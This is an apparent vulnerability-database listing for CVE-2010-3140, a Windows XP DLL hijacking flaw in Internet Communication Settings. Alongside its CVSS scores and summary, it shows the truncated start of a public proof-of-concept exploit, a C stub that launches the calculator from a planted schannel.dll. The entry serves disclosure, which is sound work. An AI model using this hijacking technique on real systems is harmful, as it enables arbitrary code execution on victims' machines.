9.3
CVSSv2

CVE-2010-3140

Published: 27/08/2010 Updated: 19/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Untrusted search path vulnerability in Microsoft Windows Internet Communication Settings on Windows XP SP3 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse schannel.dll that is located in the same folder as an ISP file.

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows xp

Exploits

/* # Exploit Title: Windows Internet Communication Settings DLL Hijacking Exploit (schanneldll) # Date: 25/08/2010 # Author: ALPdaemon # Email: ALPdaemon (at) yahoo (dot) com # Software Link: N/A # Tested on: Windows XP SP3 English # Extension: isp */ #include <windowsh> int alpdaemon() { WinExec("calc", SW_SHOW); exit(0); return 0 ...